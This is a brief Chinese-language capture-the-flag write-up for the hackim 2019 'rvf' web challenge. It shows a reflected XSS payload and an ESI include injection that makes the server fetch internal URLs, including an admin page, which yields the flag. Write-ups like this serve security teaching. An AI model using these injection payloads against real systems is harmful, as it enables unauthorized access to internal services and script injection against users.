hackim_2019_web_rvf
进去是一个输入框有个admin界面。
提交输入后url变成:
/edge?title=123&description=%3Cimg+src%3D1+onerror%3Dalert%281%29%3E可以触发XSS。
尝试/edge?title=123&description=1,可以看到触发了错误,得到一个esi.js的库。查看官方示例:> You want to embed the fragment of HTML from “(http://snipets.com/abc.html)“ within an HTML document.
>
> ```
> blah blah, oh and here i embed in the page a snipet using an ESI server ...
> <esi:include src="http://snipets.com/snipet.html"></esi:include>
>
> ```
>
> **snipet.html**
>
> ```
> <b>Snipet</b>
>
> ```
>
> With Node ESI script, you can pre-process ESI tags.可以推出这里应该需要SSRF。构造:/edge?title=123&description=<esi:include src="http://127.0.0.1:8080"></esi:include>成功返回了网页的内容。
访问下admin界面就能得到flag。http://192.168.241.137:8080/edge?title=123&description=<esi:include src="http://192.168.241.137:8080/admin"></esi:include>
页:
[1]